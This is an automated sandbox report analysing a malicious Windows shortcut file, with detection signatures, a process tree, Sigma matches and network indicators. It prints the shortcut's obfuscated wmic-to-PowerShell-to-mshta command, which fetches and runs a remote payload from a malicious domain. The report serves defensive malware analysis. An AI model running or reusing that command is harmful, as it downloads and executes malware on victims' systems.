Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
K9esyY0r4G.lnk

Overview

General Information

Sample name:K9esyY0r4G.lnk
renamed because original name is a hash value
Original sample name:ed0e0fc1ef780ad73eb559719a3621e1.lnk
Analysis ID:1581246
MD5:ed0e0fc1ef780ad73eb559719a3621e1
SHA1:a739f5a4cb67f3b8ea5b4b5d08e35c4a60f8bd8c
SHA256:6c8573069dadedd4fb861b3de01f94a87024f872fdd51652ad8959443851b333
Tags:lnkuser-abuse_ch
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Contains functionality to create processes via WMI
Creates processes via WMI
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Process Created Via Wmic.EXE
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 7608 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7684 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 7944 cmdline: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • svchost.exe (PID: 8052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Potentially Suspicious PowerShell Child Processes
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3, CommandLine: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7864, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3, ProcessId: 7944, ProcessName: mshta.exe
Sigma detected: Suspicious Process Created Via Wmic.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", ProcessId: 7608, ProcessName: WMIC.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 7608, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3'), ProcessId: 7684, ProcessName: powershell.exe
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8052, ProcessName: svchost.exe

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://nextgencoding.cyou/asd/amber3Avira URL Cloud: Label: malware
Source: https://nextgencoding.cyou/asd/amber3...Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: K9esyY0r4G.lnkVirustotal: Detection: 35%Perma Link
Source: K9esyY0r4G.lnkReversingLabs: Detection: 21%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.1% probability
Source: unknownHTTPS traffic detected: 104.21.67.124:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /asd/amber3 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nextgencoding.cyouConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://nextgencoding.cyou/asd/amber3Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nextgencoding.cyouConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://nextgencoding.cyou/asd/amber3Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nextgencoding.cyouConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /asd/amber3 HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nextgencoding.cyouConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/styles/cf.errors.css HTTP/1.1Accept: */*Referer: https://nextgencoding.cyou/asd/amber3Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nextgencoding.cyouConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1Accept: */*Referer: https://nextgencoding.cyou/asd/amber3Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nextgencoding.cyouConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: nextgencoding.cyou
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 27 Dec 2024 08:03:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0FqQnREmqgQB3pJ%2FrKa9HJjbW4tJ6kkwAav53jATEL1UNCWKG53kOWgpsALlL7fRtY%2BbHiNOexqJo34L8Uw%2Bq7Rqhp4JP9AOA%2BFMxGFbOeEPCTmb1%2BvVWJWZzALxb5ggkkgumg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f87cbbeead24405-EWR
Source: svchost.exe, 00000006.00000002.2911515466.000001AC2FC00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000006.00000003.1730371809.000001AC2FAB8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000006.00000003.1730371809.000001AC2FAB8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000006.00000003.1730371809.000001AC2FAB8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000006.00000003.1730371809.000001AC2FAED000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.6.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000004.00000002.1683435643.0000020024E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
Source: powershell.exe, 00000004.00000002.1683435643.0000020024E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.ctain
Source: powershell.exe, 00000004.00000002.1684475946.0000020026DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1684475946.0000020026E0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1684475946.0000020026DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: svchost.exe, 00000006.00000003.1730371809.000001AC2FB62000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000006.00000003.1730371809.000001AC2FB62000.00000004.00000800.00020000.00000000.sdmp, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: mshta.exe, 00000005.00000002.2909564054.0000028034AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/F
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2911705915.00000288377F9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2909564054.0000028034A80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2909564054.0000028034AF8000.00000004.00000020.00020000.00000000.sdmp, K9esyY0r4G.lnkString found in binary or memory: https://nextgencoding.cyou/asd/amber3
Source: powershell.exeString found in binary or memory: https://nextgencoding.cyou/asd/amber3$global:?
Source: mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3...
Source: mshta.exe, 00000005.00000002.2909564054.0000028034A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3C:
Source: mshta.exe, 00000005.00000002.2909933793.0000028034CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3H
Source: mshta.exe, 00000005.00000002.2910364312.00000288369E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3Hi0
Source: powershell.exe, 00000004.00000002.1684098929.00000200268D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3L&
Source: powershell.exe, 00000004.00000002.1683782941.0000020024FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3MS
Source: powershell.exe, 00000004.00000002.1684475946.000002002725D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3P
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3_1
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3g
Source: mshta.exe, 00000005.00000002.2912572617.0000028837915000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3https://nextgencoding.cyou/asd/amber3
Source: mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3les/cf.errors.css
Source: mshta.exe, 00000005.00000002.2909564054.0000028034A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3m
Source: mshta.exe, 00000005.00000002.2909564054.0000028034AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3ntional
Source: powershell.exe, 00000004.00000002.1684475946.0000020026DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3p
Source: mshta.exe, 00000005.00000002.2909564054.0000028034A99000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/asd/amber3q
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637
Source: mshta.exe, 00000005.00000002.2911705915.00000288377CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637...;
Source: mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637G
Source: mshta.exe, 00000005.00000002.2911705915.0000028837700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637L
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637U
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/images/icon-exclamation.png?1376755637r3_
Source: mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/phish-bypass
Source: mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/phish-bypass017
Source: mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/phish-bypassN1%
Source: mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/phish-bypassv1m
Source: mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.css
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssD
Source: mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssH
Source: mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssQ
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextgencoding.cyou/cdn-cgi/styles/cf.errors.cssd
Source: svchost.exe, 00000006.00000003.1730371809.000001AC2FB62000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2911705915.00000288377BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: mshta.exe, 00000005.00000002.2909564054.0000028034B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingnagement/phishing-attack/
Source: mshta.exe, 00000005.00000002.2909564054.0000028034ADA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landingws
Source: mshta.exe, 00000005.00000002.2911705915.000002883771F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/37
Source: mshta.exe, 00000005.00000002.2909564054.0000028034AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/H
Source: mshta.exe, 00000005.00000002.2911705915.000002883779F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/o-1
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 104.21.67.124:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

barindex
Contains functionality to create processes via WMI
Source: WMIC.exe, 00000000.00000002.1659185957.0000026AB22B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\System32\Wbem\wmic.exe"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"C:\Users\user\Desktop\K9esyY0r4G.lnkWinsta0\Defaultmemstr_b0ab49a0-a
Windows shortcut file (LNK) contains suspicious command line arguments
Source: K9esyY0r4G.lnkLNK file: process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal88.evad.winLNK@9/12@1/2
Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRHJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yctsoiwi.yqy.ps1Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: K9esyY0r4G.lnkVirustotal: Detection: 35%
Source: K9esyY0r4G.lnkReversingLabs: Detection: 21%
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://nextgencoding.cyou/asd/amber3Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
